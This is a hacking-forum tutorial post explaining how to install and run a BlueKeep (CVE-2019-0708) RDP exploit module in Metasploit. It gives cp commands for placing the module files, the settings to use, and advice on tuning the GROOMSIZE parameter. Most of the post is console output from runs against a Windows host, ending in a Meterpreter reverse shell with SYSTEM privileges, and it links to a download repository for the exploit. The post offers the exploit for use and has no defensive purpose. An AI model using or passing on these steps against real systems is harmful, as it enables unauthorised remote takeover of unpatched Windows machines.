[TUTORIAL] Using the Bluekeep Exploit
blackunix (Owner)

#1
Using the Bluekeep Exploit

Bluekeep Exploit (CVE-2019-0708)

https://blog.rapid7.com/2019/09/06/initi...2019-0708/

How to use:

Create a folder named rdp (purely for convenience) in /usr/share/metasploit-framework/modules/exploits/windows/, paste this file (cve_2019_0708_bluekeep_rce.rb) into the rdp folder, and then use your Metasploit skills.

Also replace the files in the respective folders below:

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/

cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Usage: in the msf console type use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

and use the usual settings: rhosts, lhost, payload, etc.

HOW TO MAKE THE EXPLOIT WORK:

############################

You have to set the GROOMSIZE parameter as shown below, with different values depending on the type of machine being exploited. As an example we will use a machine running in VMware (15) with Windows and hardware with 2GB of RAM and 1 processor with 1 core.

Conclusion: a GROOMSIZE of 50 worked perfectly.

############################

Code:
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
GROOMSIZE => 100
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389   - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
GROOMSIZE => 150
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389   - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
GROOMSIZE => 50
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.43.84:4444
[*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.43.137:3389   - The target is vulnerable.
[*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
[*] 192.168.43.137:3389 - Surfing channels ...
[*] 192.168.43.137:3389 - Lobbing eggs ...
[*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.43.137
[*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >



To download the file mentioned above, visit https://github.com/TinToSer/bluekeep-exploit

20-11-2019 06:29